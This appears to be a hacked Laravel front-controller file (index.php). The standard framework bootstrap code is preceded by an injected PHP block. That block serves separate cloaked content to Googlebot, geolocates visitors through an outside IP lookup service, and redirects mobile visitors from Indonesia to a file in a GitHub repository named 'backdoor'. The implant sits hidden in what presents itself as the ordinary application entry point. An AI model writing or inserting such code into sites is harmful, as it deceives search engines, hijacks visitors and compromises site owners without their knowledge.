<?php
$ip_address = $_SERVER['REMOTE_ADDR'];
$country = file_get_contents("http://ip-api.com/json/$ip_address");
$country = json_decode($country);

$user_agent = $_SERVER['HTTP_USER_AGENT'];
$is_mobile = preg_match("/(android|avantgo|blackberry|bolt|boost|cricket|docomo|fone|hiptop|mini|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i", $user_agent);

// Function to set custom title and description for Google search crawler
function spretuk() {
    if (strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) {
        // Serve custom content for Googlebot
        include('okgas/index.html');
        // Exit to prevent the original content from being displayed
        exit();
    }
}

// Call the function to set custom content for Googlebot
spretuk();

// Check if the request is for the root domain
if ($_SERVER['REQUEST_URI'] == '/' && $country->country == "Indonesia" && $is_mobile) {
    header("Location: https://raw.githubusercontent.com/donpablo2910337/backdoor/refs/heads/main/athome.txt");
    exit();
}<?php

/**
 * Laravel - A PHP Framework For Web Artisans
 *
 * @package  Laravel
 * @author   Taylor Otwell <taylor@laravel.com>
 */

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader for
| our application. We just need to utilize it! We'll simply require it
| into the script here so that we don't have to worry about manual
| loading any of our classes later on. It feels great to relax.
|
*/

require __DIR__.'/../bootstrap/autoload.php';

/*
|--------------------------------------------------------------------------
| Turn On The Lights
|--------------------------------------------------------------------------
|
| We need to illuminate PHP development, so let us turn on the lights.
| This bootstraps the framework and gets it ready for use, then it
| will load up this application so that we can run it and send
| the responses back to the browser and delight our users.
|
*/

$app = require_once __DIR__.'/../bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request
| through the kernel, and send the associated response back to
| the client's browser allowing them to enjoy the creative
| and wonderful application we have prepared for them.
|
*/

$kernel = $app->make(\Illuminate\Contracts\Http\Kernel::class);

$response = $kernel->handle(
    $request = \Illuminate\Http\Request::capture()
);

$response->send();

$kernel->terminate($request, $response);
